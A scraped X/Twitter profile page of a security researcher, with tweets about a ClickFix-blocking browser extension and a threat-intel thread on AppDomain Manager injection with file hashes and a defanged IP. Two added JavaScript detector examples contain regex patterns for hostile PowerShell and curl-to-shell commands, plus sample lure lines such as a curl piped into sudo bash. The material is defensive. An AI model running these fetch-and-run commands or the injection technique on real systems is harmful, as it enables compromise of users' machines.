ExploitedSite

38 posts

@ExploitedSite

Security Researcher | Low-Level Ninja | RE & Malware RE Maniac. Tweets are my own.

Dublin City, Ireland · Joined July 2012
195 Following · 196 Followers
Pinned Tweet
ExploitedSite (@ExploitedSite)
🛡️ Launched BinHex.Ninja Security – browser extension blocking ClickFix attacks
✅ Real-time detection
✅ Clipboard protection
✅ Privacy-first & actively developed
📥 binhex.ninja/extension.html
📧 Feedback: re.team@binhex.ninja
🙏 Thanks to all who share anonymous data
ExploitedSite retweeted
Tim Blazytko (@mr_phrazer)
Recently my RE workflow moved into sandboxed VMs where agents have full control over the environment. I needed an MCP server that runs headless in the same sandbox and exposes way more of the #BinaryNinja API than others. Here's the release: github.com/mrphrazer/bina…
ExploitedSite (@ExploitedSite)
@struppigel Any plans of putting the course/bundle on discount for Black Friday/Cyber Monday? :)
EvilSec (@EvilSecOfficial)
@RussianPanda9xx You interviewed someone from... Arctic Wolf? A company that has a worse track record than Cylance? (Impressive that Cylance isn't the worst anymore.) They still struggle with Mimikatz from 7 years ago; asking them anything recent is just purely unfair.
RussianPanda 🐼 🇺🇦 (@RussianPanda9xx)
Honey, wake up. We interviewed a Senior Threat Researcher at a large MDR company and asked YOUR questions 🐺 Have a recommendation on WHO we should interview next? Drop a comment below 👇 youtube.com/watch?v=UXmgVX…
ExploitedSite retweeted
The Haag™ (@M_haggis)
🛡️ Deep dive into ClickFix attack protection! Just demoed the ClickFix Security extension - created by binhex.ninja / @ExploitedSite.
🔗 Extension: chromewebstore.google.com/detail/binhexn…
📖 Analysis: binhex.ninja/extension.html
In this demo, we:
✅ Walk through its multi-layer defense system
✅ Break down dual-world execution (ISOLATED + MAIN)
✅ Show 5 layers of clipboard protection catching attacks live
✅ Analyze live ClickFix sites blocking malicious payloads instantly
🔍 Detects 100+ attack patterns:
• Base64 PowerShell
• curl | bash payloads
• WSH exploitation
• Fake CAPTCHA tricks
• Clipboard hijacking
💡 How ClickGrab fits in: github.com/MHaggis/ClickG…
ClickGrab hunts campaigns + extracts IOCs
BinHex.Ninja blocks them in-browser
Huge shout-out to @ExploitedSite for the amazing work and the time spent building and sharing this with the community. 👏
Together = full ClickFix defense pipeline 🔄
📺 youtu.be/XuXsfg-yEts
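An added example, not code from the post above or from the BinHex.Ninja project, of the clipboard-protection idea the demo describes: a guard around a clipboard-like writeText that classifies the text against the indicator categories listed above before it is written. The regexes, the strong/weak split, the writeText interface and the constructed samples are my assumptions.

```javascript
// Added example, not the BinHex.Ninja extension's own code: a small clipboard
// guard of the kind a ClickFix blocker installs in the page's MAIN world.
// The pattern list and the writeText(text) interface of the guarded object
// (shaped like navigator.clipboard) are my assumptions, not the project's.
const CLICKFIX_PATTERNS = [
  // "strong" = a command carrying its payload; "weak" = an evasion flag or
  // script host that only blocks together with a second indicator.
  { name: "base64-powershell", strong: true,
    re: /powershell(\.exe)?\b[^\n]*?-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+\/=]{16,}/i },
  { name: "curl-pipe-shell", strong: true,
    re: /\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b/i },
  { name: "wsh-host", strong: false, re: /\b(wscript|cscript)(\.exe)?\b/i },
  { name: "hidden-window", strong: false, re: /-w(?:indowstyle)?\s+hidden\b/i },
];

// Classify text a page is trying to place on the clipboard.
function classifyClipboardText(text) {
  const hits = CLICKFIX_PATTERNS.filter((p) => p.re.test(text));
  let verdict = "allow";
  if (hits.some((p) => p.strong) || hits.length >= 2) verdict = "block";
  else if (hits.length === 1) verdict = "warn";
  return { verdict, hits: hits.map((p) => p.name) };
}

// Wrap writeText so blocked content never reaches the real clipboard.
// onBlock runs synchronously before the rejected promise is returned.
function installClipboardGuard(clipboardLike, onBlock) {
  const original = clipboardLike.writeText.bind(clipboardLike);
  clipboardLike.writeText = function guardedWriteText(text) {
    const result = classifyClipboardText(String(text));
    if (result.verdict === "block") {
      onBlock(result, String(text));
      return Promise.reject(new Error("clipboard write blocked: " + result.hits.join(",")));
    }
    return original(text);
  };
  return clipboardLike;
}

// Constructed samples, not real campaign payloads: the base64 is just "ABC...Z".
const SAMPLES = {
  benign: "git clone https://example.test/repo.git",
  lure: "powershell -w hidden -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=",
  curlBash: "curl -fsSL https://example.test/setup.sh | sudo bash",
  wsh: "wscript.exe helper.vbs",
};
for (const [label, text] of Object.entries(SAMPLES)) {
  console.log(label, JSON.stringify(classifyClipboardText(text)));
}
```

In a real extension the guard would be installed on `navigator.clipboard` from the MAIN world and the `onBlock` callback would report to the ISOLATED world; here a fake clipboard object stands in for it.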
ExploitedSite (@ExploitedSite)
@M_haggis Thank you for the kind words! I’m currently working on fixes, updates, and enhancements to address various browser-based threats. The support from everyone so far has been amazing. The plan is to keep it community-driven with a focus on helping everyone stay safer online.
RussianPanda 🐼 🇺🇦 (@RussianPanda9xx)
Check this tool that my buddy wrote that blocks ClickFix attacks. Promise, it’s not a clipper malware, I reversed the extension myself 🤣
Quoting ExploitedSite (@ExploitedSite):

🛡️ Launched BinHex.Ninja Security – browser extension blocking ClickFix attacks
✅ Real-time detection
✅ Clipboard protection
✅ Privacy-first & actively developed
📥 binhex.ninja/extension.html
📧 Feedback: re.team@binhex.ninja
🙏 Thanks to all who share anonymous data

ExploitedSite (@ExploitedSite)
@Protoge420 @RussianPanda9xx Yeah, the API key is used to tell the server - “Hey I’m Chrome, please do the key exchange with me” or “Hey I’m Firefox, please do the key exchange with me”. It’s not a key-key in the grand scheme of things, more like an identifier of browser type 😃
ExploitedSite (@ExploitedSite)
@IndiGo6E No update so far on this. Case reference number - 26102775. Not even sure if I’ll get one before travel dates.
IndiGo (@IndiGo6E)
@ExploitedSite Hi, kindly allow us some time, our team will connect with you shortly. ~Malishka
John Hammond (@_JohnHammond)
A threat actor installed Huntress. ... a hysterical mistake on their part, giving us first-hand insight into their tooling, workflow & routine. Phishing infra, stealer logs, Telegram+dark web sites, AI... Hilarious goldmine of cybercrime deets with a front row seat: huntress.com/blog/rare-look…
ExploitedSite (@ExploitedSite)
@RussianPanda9xx After 2025 years and millions more of evolution, humans finally realized that buzzwords like EDR, XDR, and zero trust actually have real powers. Mind blown.
RussianPanda 🐼 🇺🇦 (@RussianPanda9xx)
Funny how folks complain about EDR “seeing too much” … That visibility is literally what stops you from waking up to ransomware notes at 3AM
ExploitedSite retweeted
Daax (@daaximus)
Unlock forbidden Windows knowledge! 🤫💻 Find the PEB through truly undetected means and pop calculator 💥 The non-golf form will be available below 👇 #redteamtips #windowsinternals #rust
ExploitedSite retweeted
João Vitor (Keowu) (@keowu)
My new article, "Writing a Full Windows ARM64 Debugger for Reverse Engineering," covers the topic in detail, including its internals and the core differences between Windows on Intel and ARM64: keowu.re/posts/Writing-…
DaveTheResearcher (@DaveLikesMalwre)
Digging into the injection we can observe the use of COMPlus_ETWEnabled=0 🥷 - This aims to disable ETW on the host in order to allow for the DLL load, which is defined in the next variable APPDOMAIN_MANAGER_ASM=Transaction 💣 (referencing the Transaction.dll seen above), followed by the function call to execute at run time, APPDOMAIN_MANAGER_TYPE=MicroTransact (MicroTransact is contained inside the Transaction DLL seen below).
XREF - Attack method covered by @rapid7 -> https://www.rapid7[.]com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/
CC: Thanks @ExploitedSite for providing the blog find and aiding in the investigation!
DaveTheResearcher (@DaveLikesMalwre)
📁 AppDomain Manager Injection via LNK 1/🧵
Today I found an interesting campaign utilising a double extensioned LNK file to perform AppDomain Manager injection to deliver an environment variable stealer mimicking @Netskope domains... The PE Resource parent is a PlugX file.
File Hash: 35120006e3d4621f081077991096bfccc5f8a12f8ce9dafa5bcb70304bd02202
OpenDir IP: http://34.224.90[.]25/
Hosted Files:
- Netskope_Signup.docx.lnk (b9d4c0ea77e598b45015e36624d8fbe4)
- /Documents/Netskope.exe (Microsoft.Uev.SyncController.exe renamed - acf59b4425a04f81aafc1cb83c2194ae)
- /Documents/Transaction.dll (Env var stealer - 2881c62e11f213d6ef81e2d4f1c50790)
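An added example, not code from the thread above or from any tool it names, that turns the thread's indicators (the APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE pair, COMPlus_ETWEnabled=0, a renamed signed binary, a document-looking .lnk name) into a detection over process-creation events. The Sysmon-like field names, the severities and the constructed sample events are my assumptions.

```javascript
// Added example (not code from the thread above): scans process-creation events
// in a Sysmon-like shape (image, OriginalFileName, environment) for the AppDomain
// Manager injection setup the thread describes. Field names, severities and the
// sample events are my own assumptions.
function upperKeys(obj) {            // env var names are case-insensitive on Windows
  const out = {};
  for (const [k, v] of Object.entries(obj || {})) out[k.toUpperCase()] = String(v);
  return out;
}
function baseName(p) { return String(p).split(/[\\\/]/).pop(); }

// Shortcut named <document extension>.lnk, e.g. "report.docx.lnk".
function isDoubleExtensionLnk(name) {
  return /\.(docx?|xlsx?|pptx?|pdf|txt)\.lnk$/i.test(baseName(name));
}

function scanProcessEvent(evt) {
  const env = upperKeys(evt.env);
  const findings = [];
  const asm = env.APPDOMAIN_MANAGER_ASM, type = env.APPDOMAIN_MANAGER_TYPE;
  // With both set, the CLR loads <ASM>.dll and instantiates <TYPE> before Main runs.
  if (asm && type) {
    findings.push({ sev: "high", why: `AppDomainManager override ${asm}.dll / ${type}` });
    if (env.COMPLUS_ETWENABLED === "0") {
      findings.push({ sev: "high", why: "CLR ETW disabled (COMPlus_ETWEnabled=0) in same process" });
    }
  } else if (asm || type) {
    findings.push({ sev: "medium", why: "partial AppDomainManager environment" });
  }
  // Signed binary copied under a new name: image name differs from OriginalFileName.
  const orig = evt.originalFileName;
  if (orig && baseName(evt.image).toLowerCase() !== orig.toLowerCase()) {
    findings.push({ sev: "medium", why: `image renamed from ${orig}` });
  }
  const verdict = findings.some((f) => f.sev === "high") ? "alert"
    : findings.length ? "review" : "clean";
  return { image: evt.image, verdict, findings };
}

// Constructed sample events: names follow the thread, paths are made up.
const EVENTS = [
  { image: "C:\\Users\\me\\Documents\\Netskope.exe", originalFileName: "Microsoft.Uev.SyncController.exe",
    env: { APPDOMAIN_MANAGER_ASM: "Transaction", APPDOMAIN_MANAGER_TYPE: "MicroTransact", COMPlus_ETWEnabled: "0" } },
  { image: "C:\\Program Files\\Acme\\acme.exe", originalFileName: "acme.exe", env: {} },
];
function scanAll(events) { return events.map(scanProcessEvent); }

for (const r of scanAll(EVENTS)) console.log(r.verdict, r.findings.map((f) => f.why));
```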